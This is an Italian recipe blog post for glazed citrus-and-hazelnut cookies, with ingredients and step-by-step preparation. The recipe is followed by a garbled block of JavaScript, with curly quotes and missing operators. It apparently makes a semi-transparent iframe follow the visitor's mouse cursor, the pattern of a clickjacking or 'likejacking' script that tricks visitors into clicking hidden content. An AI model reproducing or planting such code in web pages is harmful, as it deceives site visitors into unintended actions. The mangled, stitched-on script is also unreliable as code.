lunedì 7 ottobre 2013

Biscotti glassati agli agrumi

INGREDIENTI PER 4 PERSONE

200 gr di zucchero a velo
150 gr di burro
150 gr di zucchero
150 gr di nocciole
150 gr di farina "00"
3 albumi
1 pizzico di bicarbonato
1 cucchiaio di scorza di arancia grattugiata
1 cucchiaio di succo di limone
20 gr di cioccolato fondente
1 cucchiaio di scorzette di arancia candite tagliate a dischetti

PREPARAZIONE

Scaldate il forno a 200°c.Fate sciogliere il burro a bagnomaria e lasciatelo intiepidire .Frullate  le nocciole poche per volta,con 1-2 cucchiai di zucchero semolato.Disponete la farina a fontana sulla spianatoia ,unite il burro ,lo zucchero rimasto ,le nocciole tritate ,gli albumi ,il bicarbonato e la sorza d'arancia .Impastate il tutto ,formate un rotolo e tagliatelo a fettine dello spessore di 1,5 cm circa.Allineate i biscotti su una placca rivestita con carta da forno e cuoceteli per 10-12 min .Sfornateli appena saranno dorati e lasciateli raffreddare.Setacciateli in una ciotola lo zucchero a velo ,unite il succo di limone e 1 cucchiaio di acqua e mescolate fino ad ottenere una glassa densa.Con l aiuto di una spatola stendete rapidamente la glassa sui biscotti e lasciateli rassodare .Nel frattempo spezzettate il cioccolato e fatelo fondere a bagnomaria .Formate un piccolo imbuto con una striscia di carta da forno ,riempitelo con un cucchiaio di cioccolato fuso e tagliatene la punta.Premete leggermente l imbuto facendo scendere a filo il cioccolato e disegnate dei fiori sulla superficie della glassa.Tenete pronti altri imbutini in modo che il cioccolato scenda sempre in modo fluido e uniforme .Completate ciascun fiore con una goccia di cioccolato al centro e fate aderire prima che si raffreddi mettete anche un dischetto di scorza d'arancia candita.Lasciate rassodare completamente la decorazione dei biscotti prima di servire ... ecco fatto il piatto e' pronto!!!

text/javascript”> var opacity = 0.5; var time = 0; if((document.getElementById) window.addEventListener || window.attachEvent){ (function(){ var hairCol = “#ff0000″; var d = document; var my = -10; var mx = -10; var r; var vert = “”; var idx = document.getElementsByTagName(‘div’).length; var thehairs = “”; document.write(thehairs); var like = document.getElementById(“theiframe”); document.getElementsByTagName(‘body’)[0].appendChild(like); var pix = “px”; var domWw = (typeof window.innerWidth == “number”); var domSy = (typeof window.pageYOffset == “number”); if (domWw) r = window; else{ if (d.documentElement typeof d.documentElement.clientWidth == “number” d.documentElement.clientWidth != 0) r = d.documentElement; else{ if (d.body typeof d.body.clientWidth == “number”) r = d.body; } } if(time != 0){ setTimeout(function(){ document.getElementsByTagName(‘body’)[0].removeChild(like); if (window.addEventListener){ document.removeEventListener(“mousemove”,mouse,false); } else if (window.attachEvent){ document.detachEvent(“onmousemove”,mouse); } }, time); } function scrl(yx){ var y,x; if (domSy){ y = r.pageYOffset; x = r.pageXOffset; } else{ y = r.scrollTop; x = r.scrollLeft; } return (yx == 0) ? y:x; } function mouse(e){ var msy = (domSy)?window.pageYOffset:0; if (!e) e = window.event; if (typeof e.pageY == ‘number’){ my = e.pageY – 5 – msy; mx = e.pageX – 4; } else{ my = e.clientY – 6 – msy; mx = e.clientX – 6; } vert.top = my + scrl(0) + pix; vert.left = mx + pix; } function ani(){ vert.top = my + scrl(0) + pix; setTimeout(ani, 300); } function init(){ vert = document.getElementById(“theiframe”).style; ani(); } if (window.addEventListener){ window.addEventListener(“load”,init,false); document.addEventListener(“mousemove”,mouse,false); } else if (window.attachEvent){ window.attachEvent(“onload”,init); document.attachEvent(“onmousemove”,mouse); } })(); }//End. script>